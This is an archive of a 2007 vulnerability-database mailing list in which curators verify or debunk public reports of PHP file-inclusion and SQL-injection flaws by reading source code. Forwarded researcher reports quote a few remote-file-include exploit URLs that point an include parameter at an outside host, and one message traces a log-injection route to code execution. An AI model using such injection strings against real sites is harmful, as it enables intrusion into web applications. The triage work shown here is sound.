From coley at mitre.org Wed Jan 3 20:41:34 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 3 Jan 2007 20:41:34 -0500 (EST)
Subject: [VIM] Provable vendor ACK for CVE-2006-6810 (DB Hub DoS)
Message-ID: <200701040141.l041fYHS016752@faron.mitre.org>

http://mieszkancy.ds.pg.gda.pl/~centurion/darkbot/stat/click.php?id=22

This download file for version 0.353 has a changelog (DB-ChangeLog) entry for 0.352 that says "fixed this critical security bug http://www.critical.lt/?vuln/548" which is the original disclosure for CVE-2006-6810.

- Steve

From jkouns at opensecurityfoundation.org Thu Jan 4 00:30:26 2007
From: jkouns at opensecurityfoundation.org (jkouns)
Date: Thu, 04 Jan 2007 00:30:26 -0500
Subject: [VIM] OSVDB 24021: 1WebCalendar viewEvent.cfm EventID Variable SQL Injection
Message-ID: <459C90F2.1020105@opensecurityfoundation.org>

OSVDB-ID 24021 Comment

Official Statement from Benson IT Solutions (1/3/2007)

WebCalendar v4 has been updated to include fixes that filter the url numeric and date variables in question and prevent non-numeric and non-date values from being passed to the SQL queries. This fixes the problems with the pages in question.

http://www.bensonitsolutions.com/Calendar/v4/

---------------------

Guessing version 4.1?

From heinbockel at mitre.org Thu Jan 4 11:25:29 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Thu, 4 Jan 2007 11:25:29 -0500
Subject: [VIM] CVE Dispute - PHPIrc_bot PHP file inclusion
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01726A56@IMCSRV5.MITRE.ORG>

researcher: ZooZ

BUGTRAQ:20061231 PHPIrc_bot <= Remote File Include
http://www.securityfocus.com/archive/1/archive/1/455613/100/0/threaded

researcher-claimed vulnerable code (sic):

> ;(include_once ($dir . $file

relevant code from php4you.php (lines 47-57):

> $dir = "bot_functions/";
> $dirh = opendir($dir);
> while ($file = readdir($dirh)) {
>     if (substr($file, -4) == ".php") {
>         include_once($dir . $file);
>     }
> }
> closedir($dirh);

obviously both $file and $dir are defined before use...

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From coley at mitre.org Thu Jan 4 15:04:34 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 4 Jan 2007 15:04:34 -0500 (EST)
Subject: [VIM] CVE dispute of Enigma WordPress RFI
Message-ID: <200701042004.l04K4Ynk027433@faron.mitre.org>

Researcher: xoron

Ref: http://www.securityfocus.com/archive/1/archive/1/455555/100/0/threaded

The quoted code is:

  require_once($boarddir . '/PortalSources/Portal.ini.php');

$boarddir is not defined in Enigma2.php, but there's an include of an SSI.php file before that use of $boarddir:

  $SSIpath = '/home/username/public_html/SSI.php';
  ...
  include_once($SSIpath);

$SSIpath is expected to be modified by the user. However, SSI.php doesn't exist in Enigma2. Some research shows that Enigma2 uses SMF. A download of SMF 1.1.1 yields SSI.php:

  global $boardurl, $boarddir, $sourcedir, $webmaster_email, $cookiename;

with no other uses of $boarddir. However, later on we have:

  require_once(dirname(__FILE__) . '/Settings.php');

and Settings.php has:

  $boarddir = dirname(__FILE__);    # The absolute path to the forum's folder. (not just '.'!)

The only apparent use of later variable overwrites ($$varname=x) is in ManageServer.php with fixed variable names, which appears to be intended for admin access only.

So, it looks like $boarddir can't be overwritten by the attacker.

- Steve

From coley at mitre.org Thu Jan 4 15:38:08 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 4 Jan 2007 15:38:08 -0500 (EST)
Subject: [VIM] Source VERIFY of Enigma Coppermine Bridge RFI
Message-ID: <200701042038.l04Kc86D029406@faron.mitre.org>

Researcher: xoron

Ref: http://www.milw0rm.com/exploits/3050

Interesting how almost the exact same line in 2 separate disclosures can have one dispute and one verification.
Using the download identified in the original disclosure, possibly version 1.0 (inferred from Enigma Files/modules/Mod_Coppermine.php), we have:

  global $BRIDGE, $boarddir, $portalSources, $portal_version, $context, $settings, $user_info;
  ...
  require_once($boarddir . '/PortalSources/Portal.ini.php');

with no includes/etc. beforehand.

- Steve

From jericho at attrition.org Fri Jan 5 15:17:49 2007
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 5 Jan 2007 15:17:49 -0500 (EST)
Subject: [VIM] vendor ack - 21849: EPiX Search Module query Variable XSS (fwd)
Message-ID:

---------- Forwarded message ----------
From: Hani Suleiman
To: moderators at osvdb.org
Date: Fri, 5 Jan 2007 18:06:02 +0000
Reply-To: moderators at osvdb.org
Subject: [OSVDB Mods] [Change Request] 21849: EPiX Search Module query Variable XSS

Hi there,

This issue is fixed in epix 3.1.3 and later, please update your database accordingly. Thank you!

You can verify by trying to inject html into the search page at www.formicary.net

From jericho at attrition.org Sat Jan 6 17:39:57 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 6 Jan 2007 17:39:57 -0500 (EST)
Subject: [VIM] vendor ack: SolidState RFI
Message-ID:

http://www.solid-state.org/index.php?name=PNphpBB2&file=portal&article=1&sid=60d164e325a32a0a56ed5e7b481f305a

SolidState v0.4.1

SolidState v0.4.1 has been released! Changes: Fixed a remote file inclusion vulnerability present in most class files.

CVE-2006-5020
http://www.milw0rm.com/exploits/2413
XF:solidstate-basepath-file-include(29095)

From jericho at attrition.org Mon Jan 8 02:02:48 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 8 Jan 2007 02:02:48 -0500 (EST)
Subject: [VIM] Bogus RFI Reports Getting Out of Hand
Message-ID:

I know we're all getting tired of them, but this one takes the cake so far.

Fri Jun 16 2006
http://archives.neohapsis.com/archives/bugtraq/2006-06/0321.html
(1) path/action.php, and to files in path/nucleus including (2) media.php, (3) /xmlrpc/server.php, and (4) /xmlrpc/api_metaweblog.inc.php

Sat Jun 17 2006
http://archives.neohapsis.com/archives/bugtraq/2006-06/0447.html
Demonstrated that the vulnerability is bogus.

Mon Oct 30 2006
http://archives.neohapsis.com/archives/bugtraq/2006-10/0486.html
media.php

Mon Oct 30 2006
http://archives.neohapsis.com/archives/bugtraq/2006-10/0501.html
Demonstrated (again) that the vulnerability is bogus.

So not only is it fake, it was previously disclosed and debunked, and these people still don't get it...

I swear, Bugtraq moderators should seriously consider blocking any RFI disclosure from hotmail.com. Would save us a lot of time.

From bugtraq at cgisecurity.net Mon Jan 8 02:00:40 2007
From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net)
Date: Mon, 8 Jan 2007 02:00:40 -0500 (EST)
Subject: [VIM] Bogus RFI Reports Getting Out of Hand
In-Reply-To:
Message-ID: <20070108070040.11039.qmail@cgisecurity.net>

> Fri Jun 16 2006
> http://archives.neohapsis.com/archives/bugtraq/2006-06/0321.html
> (1) path/action.php, and to files in path/nucleus including (2) media.php,
> (3) /xmlrpc/server.php, and (4) /xmlrpc/api_metaweblog.inc.php
>
> Sat Jun 17 2006
> http://archives.neohapsis.com/archives/bugtraq/2006-06/0447.html
> Demonstrated that the vulnerability is bogus.
>
> Mon Oct 30 2006
> http://archives.neohapsis.com/archives/bugtraq/2006-10/0486.html
> media.php
>
> Mon Oct 30 2006
> http://archives.neohapsis.com/archives/bugtraq/2006-10/0501.html
> Demonstrated (again) that the vulnerability is bogus.
>
> So not only is it fake, it was previously disclosed and debunked, and
> these people still don't get it...
>
> I swear, Bugtraq moderators should seriously consider blocking any RFI
> disclosure from hotmail.com. Would save us a lot of time.
>

Should the moderators be performing analysis of each post in detail before allowing it to post? I'm thinking this would drag out the postings to the point of being lagged weeks behind the other lists. Have you considered making a list of bogus vuln authors and forwarding them to the list moderators?

BTW I really like what you guys are doing.

- zeno
http://www.cgisecurity.com/

From jericho at attrition.org Mon Jan 8 02:18:26 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 8 Jan 2007 02:18:26 -0500 (EST)
Subject: [VIM] Bogus RFI Reports Getting Out of Hand
In-Reply-To: <20070108070040.11039.qmail@cgisecurity.net>
References: <20070108070040.11039.qmail@cgisecurity.net>
Message-ID:

: > I swear, Bugtraq moderators should seriously consider blocking any RFI
: > disclosure from hotmail.com. Would save us a lot of time.
:
: Should the moderators be performing analysis of each post in detail
: before allowing it to post? I'm thinking this would drag out the
: postings to the point of being lagged weeks behind the other lists. Have

I don't. The moderation is already a bit slow at times, especially on holidays or anytime there is a transition between moderators. Unfortunately, they really can't even take my suggestion to heart because it would likely block a handful of legitimate disclosures, and that doesn't fly.

: you considered making a list of bogus vuln authors and forwarding them
: to the list moderators?

Yes. OSVDB is adding all of these bogus reports to our database and tracking creditee with the intent of being able to easily generate such a list for many purposes, including that.

Call me a bastard, but i'd like to see the people *repeatedly* posting bogus RFI bugs get harassed more so they stop posting without validating their findings.
From bugtraq at cgisecurity.net Mon Jan 8 02:16:40 2007
From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net)
Date: Mon, 8 Jan 2007 02:16:40 -0500 (EST)
Subject: [VIM] Bogus RFI Reports Getting Out of Hand
In-Reply-To:
Message-ID: <20070108071640.12912.qmail@cgisecurity.net>

> : Should the moderators be performing analysis of each post in detail
> : before allowing it to post? I'm thinking this would drag out the
> : postings to the point of being lagged weeks behind the other lists. Have
>
> I don't. The moderation is already a bit slow at times, especially on
> holidays or anytime there is a transition between moderators.
> Unfortunately, they really can't even take my suggestion to heart because
> it would likely block a handful of legitimate disclosures, and that
> doesn't fly.

Have they responded to emails about specific vulnerabilities by VIM by updating vulns posted on their site?

> : you considered making a list of bogus vuln authors and forwarding them
> : to the list moderators?
>
> Yes. OSVDB is adding all of these bogus reports to our database and
> tracking creditee with the intent of being able to easily generate such a
> list for many purposes, including that.
>
> Call me a bastard, but i'd like to see the people *repeatedly* posting
> bogus RFI bugs get harassed more so they stop posting without validating
> their findings.

Maybe you should draft up a top ten bogus vuln finders article and post it to the lists :) It would be interesting to see statistics regarding if the 'disclosure' knew it was fake, or if they thought it was real.

- zeno
http://www.cgisecurity.com/
Application Security news, and more
http://www.cgisecurity.com/index.rss [RSS Security Feed]

From theall at tenablesecurity.com Mon Jan 8 11:04:50 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 08 Jan 2007 11:04:50 -0500
Subject: [VIM] ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow Vulnerability
Message-ID: <45A26BA2.4090409@tenablesecurity.com>

Does anyone know if the overflow in WorldMail that ZDI announced late last week (CVE-2006-6336 reportedly) also affects RockLiffe's MailSite product line? WorldMail is apparently just a rebranded version of MailSite SE.

George
--
theall at tenablesecurity.com

From coley at linus.mitre.org Mon Jan 8 14:01:22 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 8 Jan 2007 14:01:22 -0500 (EST)
Subject: [VIM] Bogus RFI Reports Getting Out of Hand
In-Reply-To: <20070108071640.12912.qmail@cgisecurity.net>
References: <20070108071640.12912.qmail@cgisecurity.net>
Message-ID:

On Mon, 8 Jan 2007 bugtraq at cgisecurity.net wrote:

> Maybe you should draft up a top ten bogus vuln finders article and post
> it to the lists :) It would be interesting to see statistics regarding
> if the 'disclosure' knew it was fake, or if they thought it was real.

I've been thinking this same thing, myself, perhaps (to jump on a bandwagon) as part of a Month of Vulnerability Information Errors (MOVIE) ;-)

Things are definitely getting out of hand. And even if Bugtraq tries to filter out reports from frequently erroneous researchers, they would go to full-disclosure and we'd still have to deal with it.

- Steve

From dm at securityfocus.com Mon Jan 8 15:42:16 2007
From: dm at securityfocus.com (dm at securityfocus.com)
Date: Mon, 8 Jan 2007 13:42:16 -0700
Subject: [VIM] Bogus RFI Reports Getting Out of Hand
In-Reply-To:
References: <20070108070040.11039.qmail@cgisecurity.net>
Message-ID: <20070108204216.GJ5427@securityfocus.com>

On Mon, Jan 08, 2007 at 02:18:26AM -0500, security curmudgeon wrote:
>
> : > I swear, Bugtraq moderators should seriously consider blocking any RFI
> : > disclosure from hotmail.com. Would save us a lot of time.
> :
> : Should the moderators be performing analysis of each post in detail
> : before allowing it to post? I'm thinking this would drag out the
> : postings to the point of being lagged weeks behind the other lists. Have
>
> I don't. The moderation is already a bit slow at times, especially on
> holidays or anytime there is a transition between moderators.
> Unfortunately, they really can't even take my suggestion to heart because
> it would likely block a handful of legitimate disclosures, and that
> doesn't fly.

Yeah, I vetted/code audited some of these reports myself for about a week once it was apparent that we were under "grep and gripe" attack, but this ended up being a DoS to the rest of the list traffic, not to mention all of my other non-Bugtraq related work. We do vet a lot of these internally before they go to the SecurityFocus database and watch VIM as well for other bogus reports. For a while, I was holding up the suspect posts long enough to be analyzed, but with all of the legit vulns coming in for analysis and all of the legit list traffic, this was not optimal. Crowd-sourcing the list has worked a little bit and I'll approve posts that debunk these reports when I see them but there's gotta be a better way.

I don't like the idea of blacklisting specific posters because a) they may get lucky, or even more unlikely, b) may eventually beat their heads against the wall enough to clue in to what a real RFI looks like. But after awhile we've begun to learn who has a track record for reporting bogus RFIs and treat those reports with an air of suspicion. A list of repeat offenders would be helpful to us all in this capacity. We can also be more pro-active about forwarding analysis of bogus reports to VIM if that at all helps.

> : you considered making a list of bogus vuln authors and forwarding them
> : to the list moderators?
>
> Yes. OSVDB is adding all of these bogus reports to our database and
> tracking creditee with the intent of being able to easily generate such a
> list for many purposes, including that.
>
> Call me a bastard, but i'd like to see the people *repeatedly* posting
> bogus RFI bugs get harassed more so they stop posting without validating
> their findings.

--
Dave McKinney
Symantec
keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

From coley at mitre.org Mon Jan 8 20:02:10 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 8 Jan 2007 20:02:10 -0500 (EST)
Subject: [VIM] Source verify - Coppermine Photo Gallery <= 1.4.10 code injection
Message-ID: <200701090102.l0912Agm014617@faron.mitre.org>

Researcher: DarkFig

Ref: BUGTRAQ:20070105 Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit
http://www.securityfocus.com/archive/1/archive/1/456051/100/0/threaded

I looked at the source for 1.4.10. At the bottom of the post, we have:

  ... that's why we use the html_entity_decode() function. I just wanted < for a remote php code execution sploit without admin rights :'(. When the admin view the security logs, it include "security.log.php"...

  (security.log.php)
  ==================
  [...]
  if (!defined('IN_COPPERMINE')) die();
  ?>

Due to the IN_COPPERMINE check, we can't do a direct request. The question of authentication then comes into play. viewlog.php has:

  function display_log($logname)
  ...
    log_read($logname);

Note that display_log() is only called if the user has admin privs:

  if (!$USER_DATA['has_admin_access']) {
  ...
    cpg_die(CRITICAL_ERROR,$lang_errors['access_denied'], __FILE__,1);

include/logger.inc.php has:

  define('CPG_SECURITY_LOG','security');
  ...
  function log_read( $log = null ) {
  ...
    $log = 'logs/'.$log.'.log.php';
    @include($log);

So, this is where security.log.php comes from (it's not in the actual distribution). login.php shows how we inject the code:

  if (isset($_POST['submitted'])) {
  ...
    log_write("Failed login attempt with Username: {$_POST['username']} from IP {$_SERVER['REMOTE_ADDR']} on " . localised_date(-1,$log_date_fmt),CPG_SECURITY_LOG);

So, we can only access security.log.php using viewlog.php, which can only be accessed with admin privileges. So, only admins can execute arbitrary PHP code.

- Steve

P.S. The initial report's code from init.inc.php shows some dynamic variable evaluation that unsets "$$key" for most user-supplied parameter names, which might allow for some interesting attacks on HTML_SUBST, but I did not investigate closer, so I can't be sure if there's really an issue or not.

From coley at mitre.org Mon Jan 8 21:52:45 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 8 Jan 2007 21:52:45 -0500 (EST)
Subject: [VIM] Source verify of Aratix RFI
Message-ID: <200701090252.l092qj5U015883@faron.mitre.org>

Researcher: nuffsaid

Ref: http://www.milw0rm.com/exploits/3079 (currently down; come back, str0ke!). alternate is http://securityreason.com/exploitalert/1698

The very top of the code is:

  error_reporting(E_ALL);
  include $current_path . 'inc/session.inc.php';

etc., as specified in the original report.

- Steve

From str0ke at milw0rm.com Mon Jan 8 22:43:40 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 8 Jan 2007 21:43:40 -0600
Subject: [VIM] Source verify of Aratix RFI
In-Reply-To: <200701090252.l092qj5U015883@faron.mitre.org>
References: <200701090252.l092qj5U015883@faron.mitre.org>
Message-ID: <814b9d50701081943v7947ffase31d7006f1901ffd@mail.gmail.com>

Hardware issues :) Back up brotha.

I need to start sending all of the rfi information to this list, hopefully it will help out and make someone's life a little easier.

/str0ke

On 1/8/07, Steven M. Christey wrote:
>
> Researcher: nuffsaid
>
> Ref: http://www.milw0rm.com/exploits/3079 (currently down; come back,
> str0ke!). alternate is http://securityreason.com/exploitalert/1698
>
> The very top of the code is:
>
> error_reporting(E_ALL);
>
> include $current_path . 'inc/session.inc.php';
>
> etc., as specified in the original report.
>
>
> - Steve
>

From coley at mitre.org Tue Jan 9 19:46:45 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 9 Jan 2007 19:46:45 -0500 (EST)
Subject: [VIM] "ppc engine" is WGS-PPC
Message-ID: <200701100046.l0A0kj9Q016544@faron.mitre.org>

Researcher: IbnuSina

Ref: BUGTRAQ ppc engine Multiple file inclusion
http://www.securityfocus.com/archive/1/archive/1/456386/100/0/threaded

A Google search of inurl:"ppcbannerclick.php" resulted in the discovery that the real product is WGS-PPC. This was apparently a commercial product somewhere around 2002-2004, but it has since been retired, ripped off, repackaged, and resold, as appears to be the case with many PHP products.

The executables as mentioned in the disclosure lined up with a version that I downloaded from a site of questionable motivation. Due to copyright/intellectual property uncertainties, I decided to delete the product immediately instead of verifying the researcher claims.

- Steve

From str0ke at milw0rm.com Tue Jan 9 21:31:10 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 9 Jan 2007 20:31:10 -0600
Subject: [VIM] Fwd: edit-x ecommerce (include_dir) Remote File include
In-Reply-To: <20070109213633.10366.qmail@securityfocus.com>
References: <20070109213633.10366.qmail@securityfocus.com>
Message-ID: <814b9d50701091831lf02c095ge4ac96bc38d27227@mail.gmail.com>

---------- Forwarded message ----------
From: emel_gw_ini at yahoo.com
Date: 9 Jan 2007 21:36:33 -0000
Subject: edit-x ecommerce (include_dir) Remote File include
To: bugtraq at securityfocus.com

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew

[[inject]]]---------------------------------------------------------

on file editx/edit_address.php

  $_SESSION = array();
  include($include_dir.'/'.'session.'.PHP);
  include($include_dir.'/'.'function.'.PHP);
  require_once("../ups/upsavs.php");

exploit :
http://target.lu/[editx PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?
[[End]]-----------------------------------------------------------

This is pretty much what the file looks like

  ob_start();
  $db_edx_host = "localhost";   // Database Hostname
  $db_edx_user = "";            // Database Username
  $db_edx_pass = "";            // Database Password
  $db_edx_name = "";            // Database Name
  $high_traffic = "N";          // Persistant Connections
  $edx_index = "index";         // Default PHP File
  $php = "php";                 // PHP File Extention
  $cda_dir = "cda";             // CDA Include Folder
  $include_dir = "include";     // CMA Include Folder
  $directory = "";              // Install Folder
  $smarty_dir = "smarty";       // Smarty Folder
  $template_dir = "template";   // Template Folder
  $caching = "N";               // Caching
  $debug_flag = "Y";            // Debug Flag
  $debug_file = "debug.txt";    // Debug File
  $edx_key = "editx_key";       // Decrypt Key
  include('../cda/constants.'.$php);   << doesn't seem to have anything that makes this vulnerable.
  $_SESSION = array();
  include($include_dir.'/'.'session.'.PHP);
  include($include_dir.'/'.'function.'.PHP);

Seems to be another bogus.

/str0ke

From rkeith at securityfocus.com Wed Jan 10 13:42:52 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Wed, 10 Jan 2007 11:42:52 -0700 (MST)
Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd)
Message-ID:

install_dir has been set.

This issue is not a vuln

  $install_dir = dirname(__FILE__);
  $install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins';
  include $install_dir.'/core/install.php'

----- Forwarded message from ahmed_labib_hilmy at yahoo.com -----

From: ahmed_labib_hilmy at yahoo.com
Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
To: bugtraq at securityfocus.com
Date: 9 Jan 2007 23:33:50 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070109233350.31705.qmail at securityfocus.com>

CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
Script site: http://www.cs-cart.com
Dork: Powered by CS-Cart - Shopping Cart Software

Found: irvian

Greetz: ibnusina and all
Special greetz: #hitamputih

  $install_dir = dirname(__FILE__);
  $install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins';
  include $install_dir.'/core/install.php'

Expl:
http://www.site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts]

----- End forwarded message -----

--
Dave McKinney
Symantec
keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

--
Rob Keith
Symantec

From jericho at attrition.org Wed Jan 10 15:35:29 2007
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 10 Jan 2007 15:35:29 -0500 (EST)
Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd)
In-Reply-To:
References:
Message-ID:

: install_dir has been set.
: : This issue is not a vuln : From: ahmed_labib_hilmy at yahoo.com : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability : To: bugtraq at securityfocus.com : Date: 9 Jan 2007 23:33:50 -0000 Did this mail go out, or was this rejected because you noted it was a bogus report? I haven't seen this come across my inbox yet. From rkeith at securityfocus.com Wed Jan 10 16:14:11 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Wed, 10 Jan 2007 14:14:11 -0700 (MST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: On Wed, 10 Jan 2007, security curmudgeon wrote: > > : install_dir is has been set. > : > : This issue is not a vuln > > : From: ahmed_labib_hilmy at yahoo.com > : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability > : To: bugtraq at securityfocus.com > : Date: 9 Jan 2007 23:33:50 -0000 > > Did this mail go out, or was this rejected because you noted it was a > bogus report? I haven't seen this come across my inbox yet. > I didn't realize this hadn't gone through to bugtraq yet. It may have been delayed or rejected for other reasons. I'll endeavor to ensure the report has seen the light of day before slapping the 'bogus' sticker on it. -- Rob Keith Symantec From jericho at attrition.org Wed Jan 10 16:32:02 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 10 Jan 2007 16:32:02 -0500 (EST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: : > : From: ahmed_labib_hilmy at yahoo.com : > : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability : > : To: bugtraq at securityfocus.com : > : Date: 9 Jan 2007 23:33:50 -0000 : > : > Did this mail go out, or was this rejected because you noted it was a : > bogus report? I haven't seen this come across my inbox yet. 
: : I didn't realize this hadn't gone through to bugtraq yet. It may have : been delayed or rejected for other reasons. I'll endeavor to ensure the : report has seen the light of day before slapping the 'bogus' sticker on : it. I know SF would have to decide the policy on this but.. If a bogus report comes in to Bugtraq, the moderators recognize it as such and reject it, i'd still like to see it posted here. As long as it was clear that the post was rejected, then it is easy to understand what happened and still better track how many fake reports are coming in. From dm at securityfocus.com Wed Jan 10 16:34:40 2007 From: dm at securityfocus.com (dm at securityfocus.com) Date: Wed, 10 Jan 2007 14:34:40 -0700 Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: <20070110213440.GL5427@securityfocus.com> On Wed, Jan 10, 2007 at 04:32:02PM -0500, security curmudgeon wrote: > > : > : From: ahmed_labib_hilmy at yahoo.com > : > : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability > : > : To: bugtraq at securityfocus.com > : > : Date: 9 Jan 2007 23:33:50 -0000 > : > > : > Did this mail go out, or was this rejected because you noted it was a > : > bogus report? I haven't seen this come across my inbox yet. > : > : I didn't realize this hadn't gone through to bugtraq yet. It may have > : been delayed or rejected for other reasons. I'll endeavor to ensure the > : report has seen the light of day before slapping the 'bogus' sticker on > : it. > > I know SF would have to decide the policy on this but.. > > If a bogus report comes in to Bugtraq, the moderators recognize it as > such and reject it, i'd still like to see it posted here. As long as it > was clear that the post was rejected, then it is easy to understand what > happened and still better track how many fake reports are coming in. This is a reasonable request. 
I approved this one before I was aware it was bogus, but will be rejecting any that are known to be false. We can still post them to VIM for tracking. -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 From coley at linus.mitre.org Wed Jan 10 17:57:29 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 10 Jan 2007 17:57:29 -0500 (EST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: <20070110213440.GL5427@securityfocus.com> References: <20070110213440.GL5427@securityfocus.com> Message-ID: On Wed, 10 Jan 2007 dm at securityfocus.com wrote: > This is a reasonable request. I approved this one before I was aware > it was bogus, but will be rejecting any that are known to be false. We > can still post them to VIM for tracking. This would be great, because the same disclosure is likely to come through other channels besides Bugtraq. Thanks, Steve From coley at mitre.org Wed Jan 10 19:12:53 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 10 Jan 2007 19:12:53 -0500 (EST) Subject: [VIM] Interesting advisory comments and timeline Message-ID: <200701110012.l0B0CrLm002681@faron.mitre.org> http://www.mnin.org/advisories/2007_firepass.pdf "For reasons withheld, this advisory will not contain details on vulnerable versions of FirePass. However, this information should certainly be available from the vendor's website. We would suggest creating a portal account and viewing the F5 CERT advisories and vulnerabilities page." Jul 2006 Discovered and reported a majority of vulnerabilities Long story, don.t ask. ... Nov 2006 F5 vulnerability response policy updated/modified Like the vendor bug reports, you have to register to even view the disclosure policy. - Steve From coley at mitre.org Wed Jan 10 19:53:37 2007 From: coley at mitre.org (Steven M. 
Christey) Date: Wed, 10 Jan 2007 19:53:37 -0500 (EST) Subject: [VIM] Dispute of GeoBB RFI Message-ID: <200701110053.l0B0rbvA003110@faron.mitre.org> Researcher: ShaFuq31 Ref: GeoBB Georgian Bulletin Board Remote File Include Vuln. http://www.securityfocus.com/archive/1/archive/1/456251/100/0/threaded Claim: require($action.'.php'); In the Public First Release recent version - and the only one available since December 2006, apparently: http://sourceforge.net/project/showfiles.php?group_id=184089 we have some whitelisting of the intended action, which enters the program as $a: if (!isset($a) || !in_array($a, array ('login','logout','register','vforum','vtopic','forgotpass','usercp', 'editpost','delpost','toggletopic','movetopic','deltopic','edittopic', 'forumjump','member','search', 'viewip'))) $action = 'board'; else $action = $a; So, any use of $action on the URL is set to a whitelisted value at this point. - Steve From str0ke at milw0rm.com Wed Jan 10 20:22:19 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 10 Jan 2007 19:22:19 -0600 Subject: [VIM] Dispute of GeoBB RFI In-Reply-To: <200701110053.l0B0rbvA003110@faron.mitre.org> References: <200701110053.l0B0rbvA003110@faron.mitre.org> Message-ID: <814b9d50701101722t6665bb6an5fe746dae5cebd91@mail.gmail.com> Yep isn't vulnerable. /str0ke On 1/10/07, Steven M. Christey wrote: > > Researcher: ShaFuq31 > > Ref: GeoBB Georgian Bulletin Board Remote File Include Vuln. 
> http://www.securityfocus.com/archive/1/archive/1/456251/100/0/threaded
>
> Claim:
>
> require($action.'.php');
>
> In the Public First Release recent version - and the only one
> available since December 2006, apparently:
>
> http://sourceforge.net/project/showfiles.php?group_id=184089
>
> we have some whitelisting of the intended action, which enters the
> program as $a:
>
> if (!isset($a) ||
> !in_array($a, array ('login','logout','register','vforum','vtopic','forgotpass','usercp',
> 'editpost','delpost','toggletopic','movetopic','deltopic','edittopic',
> 'forumjump','member','search', 'viewip')))
> $action = 'board';
> else
> $action = $a;
>
>
> So, any use of $action on the URL is set to a whitelisted value at
> this point.
>
>
> - Steve
>

From str0ke at milw0rm.com Wed Jan 10 20:25:44 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 10 Jan 2007 19:25:44 -0600
Subject: [VIM] Vulnerable: sazcart v1.5 (cart.php) Remote File include
Message-ID: <814b9d50701101725y5958811anbc59e3a5994c6a06@mail.gmail.com>

/*
Title: SazCart
Version: 1.5.0
Author: Tony Rouse
Status: Public release

Copyright (c) 2005 - 2006 Tony Rouse

This program is only free to TRY
Copyright information at bottom of script and "Powered by SazCart" in the toolbar
MUST be left READABLE on website until a license is purchased.
All restrictions can be viewed at:
http://www.sazcart.com/sazcart-lic.php

This file and program are provided AS IS with NO WARRANTY OF ANY KIND.
*USE AT OWN RISK*

This and all other files in the download package can only be redistributed
with written permission from Tony Rouse.
*/

include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;

---------- Forwarded message ----------
From: emel_gw_ini at yahoo.com
Date: 9 Jan 2007 22:20:54 -0000
Subject: sazcart v1.5 (cart.php) Remote File include
To: bugtraq at securityfocus.com

*********************---Hitamputih crew---********************************
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
* Risk : High
* Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community
***************************************************************************

